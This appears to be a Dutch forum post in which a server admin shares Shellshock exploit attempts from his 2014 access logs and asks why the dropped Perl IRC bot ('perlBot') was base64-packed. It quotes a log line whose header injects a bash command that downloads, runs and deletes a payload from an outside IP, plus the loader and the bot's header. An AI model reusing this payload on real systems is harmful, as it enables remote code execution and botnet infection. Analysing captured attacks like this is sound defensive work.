/u/123066/crop5db977bf69322.png?f=community)
Het is misschien aardig om te inventariseren wat er zoal aan shellshock exploits rondwaart. Buiten een paar onschuldige scans vond ik deze in mijn logs:
ec.z blijkt een eenvoudig perl script:
Grote vraag: waarom is de perlBot ingepakt? Hij had toch ook zo verstuurd kunnen worden?
code:
1
| 66.150.114.26 X.X.X.X - [28/Sep/2014:09:49:02 +0200] "GET / HTTP/1.0" 200 176 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" |
ec.z blijkt een eenvoudig perl script:
Perl:
Na decoderen van de base64 string krijg ik1
2
3
| #!/usr/bin/perl use MIME::Base64; eval(decode_base64('IyEvdXNyL2 erg lange string |
Perl:
1
2
3
4
5
6
7
8
9
10
11
12
| #!/usr/bin/perl #################################################################################################################### #################################################################################################################### ## perlBot v1.02012 By unknown @unknown ## [ Help ] #################################### ## Stealth MultiFunctional IrcBot Writen in Perl ##################################################### ## Teste on every system with PERL instlled ## !x @system ## ## ## !x @version ## ## This is a free program used on your own risk. ## !x @channel ## ## Created for educational purpose only. ## !x @flood ## ## I'm not responsible for the illegal use of this program. ## !x @utils ## #################################################################################################################### <enzovoort> |
Grote vraag: waarom is de perlBot ingepakt? Hij had toch ook zo verstuurd kunnen worden?
:strip_exif()/u/294184/20150204_SITE_GIF_VALKUIL-resized.gif?f=community)
:strip_icc():strip_exif()/u/105199/crop5cb76c6d18020_cropped.jpeg?f=community)
.
/u/147932/Mnewcopy.png?f=community)